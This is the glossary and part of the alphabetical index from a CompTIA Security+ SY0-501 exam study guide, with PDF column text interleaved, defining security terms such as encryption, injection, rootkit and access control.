communicating over a non-secure network to prove
incident - A warning that there may be a threat to
their identity to one another in a secure manner.
information or computer security. The warning
could also be that a threat has already occurred. key escrow - An arrangement in which the keys
needed to decrypt encrypted data are held in escrow
information security - The practice of preventing
so that, under certain circumstances, an authorized
unauthorized access, use, disclosure, disruption,
third party may gain access to those keys.
modification, inspection, recording, or destruction
of information. Layer 2 Tunneling Protocol (L2TP) - A tunneling
protocol used to support virtual private networks
injection - A class of attacks that rely on injecting
(VPNs) or as part of the delivery of services by
data into a web application in order to facilitate the
ISPs. It does not provide any encryption or
execution or interpretation of malicious data in an
confidentiality by itself. Rather, it relies on an
unexpected manner. Examples XSS, SQL Injection,
encryption protocol that it passes within the tunnel
Header Injection, Log Injection, and Full Path
to provide privacy.
Disclosure.
LDAP - Lightweight Directory Access Protocol. An
integer overflow - Setting an integer variable to a
application protocol used over an IP network to
value that exceeds the maximum size set aside to
manage and access the distributed directory
store it, usually through addition or multiplication
information service.
functions.
LEAP - Lightweight EAP. A Cisco-proprietary
integrity - The maintenance of, and the assurance of
version of EAP, the authentication protocol used in
the accuracy and consistency of, data over its entire
wireless networks and point-to-point connections. It
life-cycle. Integrity is a critical aspect to the design,
is designed to provide more secure authentication
implementation, and usage of any system which
for 802.11 WLANs that support 802.1X port access
stores, processes, or retrieves data.
control.
Internet of Things (IoT) - The interconnection via
least privilege - A security principle which requires
the Internet of computing devices embedded in
that, in a particular abstraction layer of a computing
everyday objects, enabling them to send and receive
environment, every module (such as a process, a
data.
user, or a program, depending on the subject) must
Internet Protocol (IPv4 and IPv6) - A set of rules be able to access only the information and resources
governing the format of data sent over the Internet that are necessary for its legitimate purpose.
or other network.
load balancer - A device that acts as a reverse
Internet Protocol Security (Ipsec) - A network proxy and distributes network or application traffic
protocol suite that authenticates and encrypts the across a number of servers. Load balancers are used
packets of data sent over a network. IPsec includes to increase capacity and reliability of applications.
protocols for establishing mutual authentication
logic bomb - A piece of code intentionally inserted
between agents at the beginning of the session and
into a software system that will set off a malicious
negotiation of cryptographic keys to use during the
function when specified conditions are met. For
session.
example, a programmer may hide a piece of code
Intrusion protection systems (IPS) - that starts deleting files (such as a salary database
Fundamentally passive monitoring systems trigger), should they ever be terminated from the
designed to keep administrators aware of malicious company.
activity: they can record detected intrusions in a
loopback address - A special IP number (most
database, and send alert notifications, but they rely
commonly 127.0.0.1) that points right back to the
on humans to actually take action.
local host.
IV - Initialization vector. An arbitrary number that
MAC address - A unique identifier assigned to
can be used along with a secret key for data
network interfaces for communications at the data
encryption. This number, also called a nonce, is
link layer of a network segment. MAC addresses are
employed only one time in any session.
used as a network address for most IEEE 802
network technologies, including Ethernet and Wi-Fi.

CompTIA Security+ Exam SY0-501 509


Appendix A: Glossary

MAC filtering - A security access control method NAT - Network address translation. A method of
whereby the 48-bit address assigned to each remapping one IP address space into another by
network card is used to determine access to the modifying network address information in Internet
network. Protocol (IP) datagram packet headers while they
are in transit across a traffic routing device.
malware - Software that is intended to damage or
disable computers and computer systems. Need to know - A restriction scheme in which, even
if one has all the necessary official approvals (such
Mandatory Access Control (MAC) - A type of
as a security clearance) to access certain
access control by which the operating system
information, one would not be given access to such
constrains the ability of a subject or initiator to
information unless one has a specific need to know;
access or generally perform some sort of operation
that is, access to the information must be necessary
on an object or target.
for one to conduct one's official duties.
MD5 - Message Digest 5. A cryptographic
network segmentation - The splitting of a
algorithm that takes an input of arbitrary length and
computer network into subnetworks, each being a
produces a message digest that is 128 bits long. The
network segment or network layer. This approach
digest is sometimes also called the "hash" or
allows organizations to enhance security and group
"fingerprint" of the input.
applications and like data together for access by a
MDM - Mobile device management. The specific group (e.g., finance).
administrative area dealing with deploying,
network switch - Also called switching hub or
securing, monitoring, integrating and managing
bridging hub. A central device that connects other
mobile devices, such as smartphones, tablets and
devices together on a computer network by using
laptops, in the workplace.
packet switching to receive, process, and forward
MTBF - Mean time between failures. data to the destination device.
MTBSI - Mean time between service incidents. NFC - Near-field communication. A set of
MTTF - Mean time to failure. communication protocols that enable two electronic
devices, one of which is usually a portable device
MTTR - Mean time to repair. such as a smartphone, to establish communication
multifactor authentication - A security framework by bringing them within 4 cm (1.6 in) of each other.
that requires more than one method of nonce - An arbitrary number used only once in a
authentication from independent categories of cryptographic communication.
credentials to verify the user's identity for a login or
other transaction. non-repudiation - A security framework in which
authenticity is verified in such a way that even the
multihomed firewall - Also known as three-homed information's author can't dispute creating it.
firewall. A firewall system connecting the three
zones (inside, outside, and DMZ) such that traffic offboarding - The identity and access management
passing between any two zones is protected by the processes surrounding the removal of an identity for
firewall. Thus, not only is the inside protected from an employee who has left the organization. May
both the outside and DMZ, the DMZ is protected also be used to describe the restriction of certain
from outside. access rights when an employee has changed roles
within the organization.
mutual authentication - A security feature in which
a client process must prove its identity to a server, OLA - Operational-level agreement. Defines the
and the server must prove its identity to the client, interdependent relationships in support of a service-
before any application traffic is sent over the client- level agreement (SLA). It describes the
to-server connection. responsibilities of each internal support group
toward other support groups, including the process
NAC - Network Access Control. An approach to and timeframe for delivery of their services.
computer security that attempts to unify endpoint
security technology (such as antivirus, host intrusion onboarding - The addition of a new employee to an
prevention, and vulnerability assessment), user or organization's identity and access management
system authentication and network security system. This term is also used if an employee
enforcement. changes roles within the organization and is granted
new or expanded access privileges.

510 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

order of volatility - The order in which you should PGP - Pretty Good Privacy. Data encryption
collect forensic security evidence. Highly volatile software that uses two digital equivalents of
data is easily lost, such as data in memory when you physical keys: a public key used for encrypting data
turn off a computer. Less volatile data, such as that can be given by its owner to anyone who wants
printouts, is relatively permanent and the least to send a secure transmission; and a private key
volatile. used for decrypting the data and known only to its
owner.
OTP - One-time password. A single-use PIN or
password that is valid for a single session, so can't pharming - An application of DNS poisoning in
be stolen and reused. The OTP still has to be known which an attacker redirects traffic for a legitimate
to both the user and the authenticator somehow, so website to a malicious imitator. Much like in a
it's a challenge to accurately create one. phishing attack, victims might be tricked into
entering credentials or other sensitive data, or into
packet - A short, fixed-length section of data that is
downloading malware.
transmitted as a unit in an electronic
communications network. Each packet contains the phishing - An attempt to obtain sensitive
address of its origin and destination, and information such as usernames, passwords, and
information that connects it to the related packets credit card details (and, indirectly, money), often for
being sent. malicious reasons, by disguising as a trustworthy
entity in an electronic communication.
PAT - Port address translation. An extension to
network address translation (NAT) that permits PII - Personally identifiable information.
multiple devices on a local area network (LAN) to
plaintext - Ordinary readable text before being
be mapped to a single public IP address. The goal of
encrypted into ciphertext or after being decrypted.
PAT is to conserve IP addresses.
port forwarding - Routing inbound traffic to local
PBKDF2 - Password-Based Key Derivation
addresses based on the destination port. For
Function 2.
example, all traffic addressed to TCP port 80 can be
PBX - Private branch exchange. A telephone system sent to the company web server, while traffic
within an enterprise that switches calls between addressed to ports 20-21 is forwarded to the FTP
enterprise users on local lines while allowing all server.
users to share a certain number of external phone
posture assessment - The evaluation of system
lines.
security based on the applications and settings that a
PCI DSS - Payment Card Industry Digital Security particular system is using. This ensures that the
Standard. client system meets certain security rules; for
example, that it has appropriate anti-virus software
PEAP - Protected EAP. A protocol that secures EAP
installed, and that its operating system and relevant
authentication in a TLS tunnel.
software is updated with the latest security updates.
penetration test - An attempt to evaluate the
PPP - Point-to-Point Protocol. A data link (layer 2)
security of an IT infrastructure by safely trying to
protocol used to establish a direct connection
exploit vulnerabilities. These vulnerabilities may
between two nodes. It is used on everything from
exist in operating systems, services and application
dialup connections to SONET leased lines, and can
flaws, improper configurations or risky end-user
carry IP, IPX, and other high-level traffic.
behavior.
PPTP - Point-to-Point Tunneling Protocol. A very
perfect forward secrecy - A property of secure
basic VPN protocol that encapsulates PPP packets
communication protocols in which compromise of
over GRE to provide VPN tunneling features,
long-term keys does not compromise past session
allowing it to carry any protocol PPP can, including
keys.
IP, IPX, and NetBEUI.
perimeter network - A physical or logical
principal - An entity (user) that can be
subnetwork that contains and exposes an
authenticated by a computer system or network.
organization's external-facing services to an
untrusted network, usually a larger network‚ such as
the Internet. (See also DMZ.)

CompTIA Security+ Exam SY0-501 511


Appendix A: Glossary

private key - A tiny bit of code that is paired with a RBAC (Role-based access control) - A method of
public key to set off algorithms for text encryption regulating access to computer or network resources
and decryption. It is created as part of public key based on the roles of individual users within an
cryptography during asymmetric-key encryption enterprise. In this context, access is the ability of an
and used to decrypt and transform a message to a individual user to perform a specific task, such as
readable format. view, create, or modify a file.
private network range - Part of internal LAN RBAC (Rule-based access control) - A method of
configuration, these network addresses aren't regulating access to computer or network resources
routable on the Internet, but are instead commonly that dynamically assigns roles to users based on
used on home or office networks. criteria defined by the custodian or system
administrator.
privilege escalation - A security attack in which an
ordinary user account or application gets RC4 - Rivest Cipher 4.
administrative rights that enable it do more harm.
redundancy - System design in which a component
Protected distribution system - In US government is duplicated so if it fails there will be a backup.
terminology, a wireline or fiber-optics (Redundancy has a negative connotation when the
telecommunication system that includes terminals duplication is unnecessary or is simply the result of
and adequate acoustical, electrical, electromagnetic, poor planning.)
and physical safeguards to permit its use for the
remote code execution - A security vulnerability
unencrypted transmission of classified information.
that allows an attacker to execute codes from a
protocol analyzer - Also known as network remote server. The most dangerous result of an
analyzer or packet analyzer. Captures and analyzes application attack, since in conjunction with
network traffic. Can read packet headers to privilege escalation it can give the attacker full
determine traffic patterns, or view protocol control of the remote computer.
information in depth.
residual risk - The threat that remains after all
proxy server - An intermediary between a client efforts to identify and eliminate risk have been
and a server: instead of the client contacting the made.
server directly, it contacts the proxy server, which in
risk - Any event or action that could cause a loss of
turn contacts the remote server. In return, the remote
or damage to computer hardware, software, data,
server communicates with the client through the
information, or processing capability.
proxy server.
rogue device - A wireless device that remains
PSK - Pre-shared key. A shared secret which was
connected to a system but does not have permission
previously shared between the two parties using
to access and operate in a network.
some secure channel before it needs to be used.
role-based training - Training that is customized to
public key cryptography - A cryptography method
the specific role that employee holds in the
that uses two mathematically-related keys: data
organization. Training content is tailored to classes
encrypted with one key can only be decrypted with
of users based on their workplace duties and
the other. Called "public" because one key can be
expected technical expertise.
shared with the public without compromising the
security of the other. root certificate - A public key certificate that
identifies a root certificate authority (CA). Root
RADIUS - Remote Authentication Dial-In User
certificates are self-signed and form the basis of an
Service.
X.509-based public key infrastructure (PKI).
RAID - Redundant array of independent disks.
rootkit - A set of software tools that enable an
rainbow table - A precomputed table for reversing unauthorized user to gain control of a computer
cryptographic hash functions, usually for cracking system without being detected.
password hashes. Commonly used in recovering a
routing table - The set of rules and data that the
plaintext password up to a certain length consisting
router uses to map its surroundings. On a large
of a limited set of characters.
network, this could be a lot of information,
RAS - Remote Access Service. including planning several hops across multiple
routers.

512 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

RSA - Rivest, Shamir, & Adleman. A cryptosystem SIEM - Security Information and Event
for public-key encryption, widely used for securing Management.
sensitive data, particularly when being sent over an
single point of failure - A system component whose
insecure network such as the internet.
failure, by itself, will stop the entire system from
S/MIME - Secure/Multipurpose Internet Mail working.
Extensions.
SLE - Single loss expectancy. The cost of any single
salt - In cryptography, random data that is used as loss.
an additional input to a one-way function that
smart cards - Authentication cards with integrated
"hashes" a password or passphrase. Closely related
circuits built in. A smart card's chip holds basic
to the concept of nonce.
identifying information like a magnetic stripe
SAN - Storage area network. A network that would; it can also hold digital certificates, store
provides access to consolidated, block level data temporary data, or even perform cryptographic
storage. Primarily used to enhance storage devices, processing functions to keep its data secure.
such as disk arrays, tape libraries, and optical
sniffer - A program that monitors and analyzes
jukeboxes, accessible to servers so that the devices
network traffic, detecting bottlenecks and problems.
appear to the operating system as locally attached
Also known as protocol analyzer.
devices.
SOAP - Simple Object Access Protocol.
sandbox - A type of software testing environment
that enables the isolated execution of software or social engineering - The use of deception to
programs for independent evaluation, monitoring or manipulate individuals into divulging confidential
testing. May be known as a test server, development or personal information that may be used for
server, or working directory. fraudulent purposes.
sanitization - Erasing a storage device, such as a spam - Irrelevant or unsolicited messages sent over
computer hard drive, so thoroughly that no residual the Internet, typically to a large number of users, for
data can be collected from the device. the purposes of advertising, phishing, spreading
malware, etc.
SCADA - Supervisory control and data acquisition.
SPI - Stateful packet inspection. A firewall
SCSI - Small Computer Systems Interface.
technology that monitors the state of active
separation of duties (SoD) - An internal control connections and uses this information to determine
designed to prevent error and fraud by ensuring that which network packets to allow through the
at least two individuals are responsible for the firewall.
separate parts of any task. SoD involves breaking
spoofing - A type of scam where an intruder
down tasks that might reasonably be completed by a
attempts to gain unauthorized access to a user's
single individual into multiple tasks so that no one
system or information by pretending to be the user.
person is solely in control.
The main purpose is to trick the user into releasing
server - A computer designed to process requests sensitive information in order to gain access to one's
and deliver data to other (client) computers over a bank account, computer system or to steal personal
local network or the internet. There are a number of information, such as passwords.
categories of servers, including print servers, file
SQL - Structured Query Language.
servers, network servers and database servers.
SSH - Secure Shell.
session - Refers to a limited time of communication
between two systems. Some sessions involve a SSL - Secure Sockets Layer. The standard security
client and a server, while other sessions involve two technology for establishing an encrypted link
personal computers. between a web server and a browser. This link
ensures that all data passed between the web server
session key - A single-use symmetric key used for
and browsers remain private and integral.
encrypting all messages in one communication
session. SSO - Single sign-on. Systems that allow one set of
user credentials to give access to a large number of
SFTP - SSH File Transfer Protocol.
services.
SHA - Secure Hash Algorithm.

CompTIA Security+ Exam SY0-501 513


Appendix A: Glossary

steganography - A form of cryptography that hides threat - Anything that has the potential to cause
secret messages in seemingly innocuous information serious harm to a computer system. It may or may
or even out of sight entirely, so that a casual not happen, but has the potential to cause serious
onlooker doesn't even know it's there. damage.
storage segmentation - Separating a particular part three-way handshake - A three-step method used
of device storage so that it that can be encrypted and in a TCP/IP network to create a connection between
controlled separately from the rest. a local host/client and server. It requires both the
client and server to exchange SYN and ACK
stream cipher - A symmetric key cipher where
packets before actual data communication begins.
plaintext digits are combined with a pseudorandom
cipher digit stream (keystream). In a stream cipher, TKIP - Temporal Key Integrity Protocol.
each plaintext digit is encrypted one at a time with
TLS - Transport Layer Security.
the corresponding digit of the keystream, to give a
digit of the ciphertext stream. transitive trust - A two-way relationship
automatically created between parent and child
structured walkthrough - An organized procedure
domains in a Microsoft Active Directory forest.
for a group of peers to review and discuss the
When a new domain is created, it shares resources
technical aspects of software development and
with its parent domain by default, enabling an
maintenance deliverables and outputs. Primary
authenticated user to access resources in both the
objectives are to find errors and to improve the
child and parent.
quality of the product.
Triple DES (3DES) - A symmetric-key block cipher
subnet - An identifiably separate part of an
that applies the DES cipher algorithm three times to
organization's network. Typically, a subnet may
each data block.
represent all the machines at one geographic
location, in one building, or on the same local area Trojan - A program that appears legitimate but
network (LAN). performs some illicit activity when run. May be
used to locate password information or make the
subnet mask - A 32-bit number that masks an IP
system more vulnerable to future entry or simply
address, and divides the IP address into network
destroy the user's stored software and data.
address and host address. Made by setting network
bits to all "1"s and setting host bits to all "0"s. typo squatting - A form of cybersquatting (and
possibly brandjacking) that relies on mistakes such
switching loop - Formed when multiple paths join
as typos made by internet users when inputting a
any two switches, passing the same frames around
website address into a web browser. Should a user
and around until they crowd out all other traffic.
accidentally enter an incorrect website address, they
TACACS+ - Terminal Access Controller Access may be led to any URL, including an alternative
Control System. website owned by a cybersquatter.
tailgating - Also known as piggybacking. Getting UDP - User Datagram Protocol.
into a secure area by tagging along right behind
UPS - Uninterpretable power supply.
someone who has legitimate access, with or without
their knowledge. URL hijacking - See typo squatting.
TCP - Transmission Control Protocol. UTM - Unified threat management.
thin client - A networked computer with few locally validation - The process of ensuring that a program
stored programs and a heavy dependence on operates on clean, correct and useful data. It uses
network resources. It may have very limited routines that check for correctness, meaningfulness,
resources of its own, perhaps operating without and security of data that are input to the system.
auxiliary drives or even software applications. virtualization - The process of creating a virtual
Typically, a thin client is one of many network (rather than actual) version of a device or resource,
computers that share computation needs by using such as a server, storage device, network or even an
the resources of one server. operating system where the framework divides the
resource into one or more execution environments.

514 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

virus - A type of malicious software program that, include webmail, online retail sales, online auctions,
when executed, replicates itself by modifying other wikis, instant messaging services, and many others.
computer programs and inserting its own code.
web of trust - A cryptography framework in which
VLAN - Virtual LAN. Any broadcast domain that is a certificate is signed by one or more third parties to
partitioned and isolated in a computer network at form a decentralized network of trust relationships:
the data link layer (OSI layer 2). if you trust any of the people who have signed the
certificate, then you should be able to trust its
VM - Virtual machine. An operating system (OS) or
owner.
application environment that is installed on
software, which imitates dedicated hardware. The WEP - Wired Equivalent Privacy.
end user has the same experience on a virtual
whitelist - A list of items (e.g., email addresses or
machine as they would have on dedicated hardware.
domain names) that are granted access to a certain
VoIP - Voice over IP. A category of hardware and system or protocol. When used, all entities are
software that enables people to use the Internet as denied access except those included in the whitelist.
the transmission medium for telephone calls by
work factor - In cryptography, the amount of effort
sending voice data in packets using IP rather than by
required to break down a cryptosystem.
traditional circuit transmissions of the PSTN.
worm - A type of computer virus that replicates
VPN - Virtual private network. A network that is
itself in order to spread to other computers. Often, it
constructed using public wires (usually the internet)
uses a computer network to spread itself, relying on
to connect remote users or regional offices to an
security failures on the target computer to access it.
organization's private, internal network.
WPA - Wi-Fi Protected Access.
vulnerability - Any weakness the asset has against
potential threats. Vulnerabilities can be hardware, WPS - Wi-Fi Protected Setup.
software, or human/organizational; likewise, they X.509 - In cryptography, a standard that defines the
can represent errors or shortcomings in system format of public key certificates. X.509 certificates
design, or known tradeoffs for desired features. are used in many Internet protocols, including
WAF - Web application firewall. An application TLS/SSL, which is the basis for HTTPS, the secure
firewall for HTTP applications that applies a set of protocol for browsing the web.
rules to an HTTP conversation. Generally, these XML - eXtensible Markup Language. A tagged
rules cover common attacks such as XSS and SQL markup language, designed to be both human- and
injection. machine-readable. Related to HTML but more
WAP - Wireless access point. general-purpose and used for all sorts of documents,
databases, and other web application data storage.
web application - A client-server software
application in which the client (or user interface) zero-day vulnerabilities - Weaknesses that even
runs in a web browser. Common web applications programmers and security vendors don't know about
and haven't countered, and which attackers might
learn about first.

CompTIA Security+ Exam SY0-501 515


516 CompTIA Security+ Exam SY0-501
Alphabetical Index
Access control..215, 404, 405, 406, 407, 408, 409, 410, Integer overflow....................................................96
411, 412 LDAP injection...................................................104
ACL............................405, 406, 409, 410, 411, 412 NoSQL injection.................................................104
Attribute-based...................................................409 Privilege escalation...............................................95
Discretionary.......................405, 406, 410, 411, 412 Race conditions.....................................................96
Implicit deny.......................................................215 SQL injection..............................101, 102, 344, 345
Inherited permissions..........................................410 XML injection.....................................................104
Mandatory...........................................................407 Application security. 298, 330, 338, 340, 341, 342, 343,
Models................................................................404 344, 345, 346, 349, 350, 351
Role-based..........................................................408 Code review........................................................349
Rule-based..........................................................409 DevOps...............................................................340
Access Control...........................................214, 216, 217 Exception handling.............................................343
Network ACLs............................................214, 216 Fuzzing...............................................................350
Switches..............................................................217 Hardening...........................................................351
ACL (Access control list)..........................214, 215, 216 Input sanitization................................343, 344, 345
Networks.....................................................214, 216 Input validation...................................343, 344, 345
Rules...................................................................215 Mobile devices....................................................330
ACL (Access Control Lists).....293, 295, 405, 406, 409, Provisioning........................................................350
410, 411, 412 Secure coding principles.....................343, 344, 345
File permissions. .293, 295, 405, 406, 410, 411, 412 Software assurance.............................................338
Network..............................................................409 Software development........................338, 341, 342
Addresses...................................................................167 Transparent database encryption (TDE).............298
MAC table..........................................................167 XSRF prevention................................................346
Addressing. 74, 166, 182, 183, 184, 185, 186, 188, 189, XSS prevention...................................................346
190, 191, 192, 207 Applications.......................................................312, 356
Assignment.........................................................189 Blacklisting.........................................................312
Classful vs. classless...........................................183 Hardening...........................................................312
DHCP..................................................................189 Virtual.................................................................356
Domain names....................................................188 Whitelisting.........................................................312
IPv4.....................................................................182 Assessments...22, 23, 24, 25, 26, 27, 28, 29, 31, 33, 35,
IPv6.....................................................................185 36, 37, 39, 40, 41, 277, 476, 477
MAC...................................................................166 Business impact..........................................476, 477
Multicast.............................................................186 Impact analysis.....................................................25
NAT.............................................................190, 191 Penetration test....................................36, 39, 40, 41
PAT......................................................................192 Privacy impact......................................................26
Resolution...................................................188, 207 Risk.................22, 23, 24, 25, 26, 27, 28, 29, 31, 33
Spoofing attacks....................................................74 Supply Chain........................................................26
Subnet mask........................................................183 Threat....................................................................24
Addressing ,.......................................................186, 187 Vulnerability.........................................................35
Domain names....................................................187 Vulnerability scan...........................................36, 37
IPv6.....................................................................186 Vulnerability scanning........................................277
MAC address......................................................187 Assets.....................................................................8, 449
Resolution...........................................................187 Management.......................................................449
Scope...................................................................186 Attacks 48, 49, 50, 52, 53, 54, 56, 57, 58, 63, 64, 66, 67,
Application attacks.94, 95, 96, 101, 102, 104, 107, 108, 72, 73, 74, 75, 79, 80, 81, 83, 84, 87, 88, 91, 94, 95, 96,
109, 344, 345, 346, 350, 351 101, 102, 104, 107, 108, 109, 169, 187, 195, 196, 344,
Arbitrary code execution................................95, 96 345, 346, 350
Buffer overflow....................................................96 Application.....94, 95, 96, 101, 102, 104, 107, 108,
Client-side...........................................107, 108, 109 109, 344, 345, 346
Command injection.............................................104 Arbitrary code execution................................95, 96
Cross-site Request Forgery (XSRF)...........109, 346 ARP poisoning....................................................187
Cross-site scripting (XSS). .108, 109, 344, 345, 346 ARP Poisoning......................................................75
Directory traversal................................................95 Attackers...................................................48, 49, 50
DoS (Denial-of-service)..................................95, 96 Backdoor...............................................................64
Fuzzing...............................................................350 Banner grabbing....................................................73
Hardening...........................................................351 Buffer overflow....................................................81
Header manipulation.............................................95 Cross-site Request Forgery (XSRF)...................346
Injection................................................................95 Cross-site scripting (XSS)..........108, 109, 344, 346

CompTIA Security+ Exam SY0-501 517


Alphabetical Index

DNS poisoning......................................................75 OAuth.................................................................396


DoS (Denial-of-service)......................79, 81, 95, 96 One-time password.............................................373
Eavesdropping......................................................87 One-time-passwords...........................................376
Flood.....................................................................81 OpenID...............................................................396
Forced access..................................................83, 84 PAP.....................................................................384
Fuzzing.........................................................73, 350 PIV......................................................................375
Inside.....................................................................52 RADIUS.............................................................385
IP spoofing............................................................74 RAS.....................................................................387
Logic bomb...........................................................64 SAML.................................................................395
MAC spoofing......................................................74 Server..................................................................382
Malware..............................................63, 64, 66, 67 Single Sign-on....................................................378
Man-in-the-middle................................................87 Smart card...........................................................375
Network................................................................72 Software token....................................................374
Overflow...............................................................96 TACACS+...........................................................387
Passwords.............................................................84 Transitive............................................................379
Pharming...............................................................75 Two-factor...........................................................372
Privilege escalation...............................................95 Wi-Fi...................................................................245
Probes...................................................................72 {Posture assessment............................................223
Replay...................................................................88 Authorization. . .404, 405, 406, 407, 408, 409, 410, 411,
Session hijacking..................................................88 412, 418, 419, 420, 421, 424, 426, 427, 428
Smurf....................................................................80 Access control models........................................404
Sniffing.................................................................87 Active Directory.........................418, 419, 420, 421
Social engineering..................52, 53, 54, 56, 57, 58 Attribute-based access control............................409
Spoofing................................................................74 DAC (Discretionary access control).405, 406, 410,
SQL injection......................................101, 102, 344 411, 412
Supply chain.........................................................66 Group policies.............................424, 426, 427, 428
SYN flood...........................................................195 MAC (Mandatory access control)......................407
Transitive access...................................................84 NTFS permissions.......................406, 410, 411, 412
Trojan horse..........................................................64 Permission propagation......................................412
UDP flood...........................................................196 Role-based access control...................................408
VLAN hopping.............................................75, 169 Rule-based access control).................................409
Watering hole........................................................64 Time of day restrictions......................................409
Wireless................................................................91 Availability.........................................................9, 15, 16
Xmas.....................................................................73 Controls.................................................................15
Zero-day................................................................72 Fault tolerance......................................................16
Authentication..137, 144, 146, 148, 149, 223, 245, 327, Redundancy..........................................................16
328, 330, 370, 371, 372, 373, 374, 375, 376, 377, 378, Single points of failure..........................................15
379, 382, 384, 385, 387, 392, 393, 395, 396 Backups..............................................485, 486, 487, 488
802.1X................................................................387 Folders................................................................488
Biometrics...........................................................377 Plans....................................................................486
CAC....................................................................375 Policies................................................................488
Certificates..................................144, 146, 148, 149 Securing..............................................................487
CHAP..................................................................384 Types...................................................................485
Credentials..........................................................373 Botnets.........................................................................64
Digital certificate................................................373 Broadcast....................................................................184
Digital signatures................................................137 Business agreements..........................................451, 453
EAP.....................................................245, 384, 387 BPA.....................................................................451
Factors.................................................................371 ISA......................................................................451
Federations..........................................................379 MOU...................................................................451
Guest network.....................................................223 SLA.....................................................................451
Hardware token...................................................374 Third parties........................................................453
HMAC................................................................137 Business continuity............476, 477, 478, 479, 481, 483
Kerberos......................................................392, 393 Alternate sites.....................................................483
LDAP..................................................................395 BCP.....................................................................477
MIC.....................................................................137 BIA.....................................................................477
Mobile credential management...........................330 DRP.....................................................................478
Mobile devices............................................327, 328 Plans....................................................................476
Multifactor..........................................................372 RPO.....................................................................481
Mutual.................................................................370 RTO.....................................................................481

518 CompTIA Security+ Exam SY0-501


Alphabetical Index

Testing.................................................................479 RSA.....................................................................132
Certificates. 144, 146, 148, 149, 150, 151, 152, 237, 238 SHA....................................................................138
Authorities..........................................................148 TKIP...................................................................244
CSL.....................................................................150 TOTP..................................................................376
CSR.....................................................................149 Twofish...............................................................128
Encodings...........................................................148 WEP....................................................................244
Formats...............................................................146 WPA............................................................244, 245
Generation...........................................................149 Cryptography......12, 116, 117, 118, 120, 121, 122, 123,
Key storage.........................................................152 124, 125, 126, 127, 131, 132, 135, 136, 137, 144, 146,
OCSP..................................................................150 148, 152, 236, 237, 309
Pinning................................................................151 Alice and Bob.......................................................12
Revocation..................................................150, 151 Cipher suites.......................................................237
SSL.............................................................237, 238 Classical......................................................117, 118
Trust models.......................................................144 Code signing.......................................................309
Types...................................................................150 Confusion and diffusion.....................................121
Certificates PGP.........................................................240 Digital certificates...............................144, 146, 148
SSL.....................................................................240 Digital signatures................................................137
Classful vs. classless..................................................183 Encryption...........................................................116
Cloud services....................................361, 362, 363, 364 Hashing...............................................135, 136, 137
Cloud system..............................................................292 Key archival........................................................152
Big data...............................................................292 Key escrow.................................................123, 152
Command-line tools...203, 204, 205, 206, 207, 208, 209 Key exchange......................................................131
Ipconfig...............................................................204 Key generation............................................122, 136
Confidentiality.........................................................9, 14 Modes of operation.............................................127
Controls.................................................................14 Modules..............................................................124
Controls......13, 14, 15, 16, 17, 18, 19, 20, 32, 461, 462, Network protocols..............................................236
464, 466, 468, 469, 471 Nonce..................................................................127
Alerts.....................................................................20 One-time pad.......................................................117
Automation...........................................................32 Perfect forward secrecy......................................131
Availability............................................................15 Private key..........................................................125
Compensating.......................................................16 Public vs. private key..................................120, 132
Confidentiality......................................................14 Semantic security................................................126
Defense in depth...................................................17 Steganography....................................................118
Detective.............................................................464 Strength.......................................................121, 122
Environmental.....................................................469 Types...................................................................120
Incident detection............................................19, 20 Work factor.........................................................116
Integrity.................................................................15 Cryptography Elliptic curve Quantum.......................132
Obscurity...............................................................18 Data. .288, 289, 290, 291, 292, 293, 295, 297, 298, 299,
Physical...............................................461, 464, 466 300, 301, 305
Preventive...........................................................466 Big data...............................................................292
Safety..................................................462, 468, 471 Classification......................................................288
Security by design.................................................18 Custodian............................................................290
Types.....................................................................13 Data Loss Prevention (DLP)...............................292
Cryptographic standards....128, 132, 138, 244, 245, 376 File permissions..................................293, 295, 297
3DES...................................................................128 Hardware encryption..........................................299
AES.....................................................................128 Life cycle............................................................291
Bcrypt.................................................................138 Ownership...........................................................290
Blowfish..............................................................128 PHI......................................................................289
CCMP.................................................................244 PII.......................................................................289
DES.....................................................................128 Secure disposal...................................................305
Diffie-Hellman....................................................132 States...................................................................291
DSA....................................................................132 Steward...............................................................290
ECC.....................................................................132 Storage encryption..............................................298
HOTP..................................................................376 Windows encryption...........................299, 300, 301
MD5....................................................................138 Data security..............................................261, 329, 458
NTLM.................................................................138 Mobile devices....................................................329
PBKDF2.............................................................138 Networks.............................................................261
RC4.....................................................................128 Training...............................................................458
RIPEMD.............................................................138 Digital signatures.......................................................137

CompTIA Security+ Exam SY0-501 519


Alphabetical Index

Disaster recovery.....478, 479, 481, 482, 483, 484, 485, Interfaces.............................................................223


487, 488 Topology.............................................................220
Alternate sites.....................................................483 Types...................................................................219
Backups...............................................485, 487, 488 Web application firewall.....................................230
DRP.....................................................................478 Hardening...................................................349, 350, 351
Fault tolerance............................................482, 484 Application.........................................349, 350, 351
RPO.....................................................................481 Hardware....................................................................304
RTO.....................................................................481 Secure destruction...............................................304
Spares..................................................................483 Hashing......................................................135, 136, 138
Testing.................................................................479 Algorithms..........................................................138
Documentation.......................23, 33, 440, 442, 443, 445 Applications........................................................136
Assessments..........................................................33 Header................................................................254, 255
Policies................................................440, 442, 445 AH.......................................................................255
Risk registers........................................................23 ESP.....................................................................254
Secure configuration guides...............................443 Host security....262, 308, 309, 310, 311, 312, 313, 314,
Email Phishing.............................................................54 315, 316, 317, 318, 319, 320, 322, 332, 432, 433
Email Spam..................................................................57 Antimalware.......................................................313
Encryption 116, 117, 118, 120, 121, 122, 123, 125, 127, Applications........................................................312
128, 131, 132, 237, 244, 298, 299, 300, 301, 329 Baselines.............................................................308
Asymmetric.................................................120, 132 Code signing.......................................................309
Asymmetric algorithms......................................132 Embedded devices..............................................320
Bitlocker.....................................................299, 301 Firewalls.............................................................313
Block and Stream ciphers...................................125 Firmware.............................................................310
Cipher suites.......................................................237 Legacy systems...................................................320
Ciphers................................................................116 Mainframes.........................................................320
Classical......................................................117, 118 Mobile operating systems...................................332
Confusion and diffusion.....................................121 Operating system hardening...............................311
Drive...................................................................298 Peripherals..........................................................312
EFS.....................................................299, 300, 301 Physical...............................................................314
Ephemeral and static keys..................................131 Removing malware.............................315, 316, 317
HSM (Hardware security module.......................299 SCADA...............................................................320
Initialization vector.............................................127 Security templates.......................................432, 433
Key exchange..............................................123, 131 Software updates.........................................318, 319
Keys............................................................116, 122 Static devices......................................................322
Mobile devices....................................................329 Trusted hardware................................................310
Mode of operation...............................................127 IEEE standards...........................................................387
One-time pad.......................................................117 802.1X................................................................387
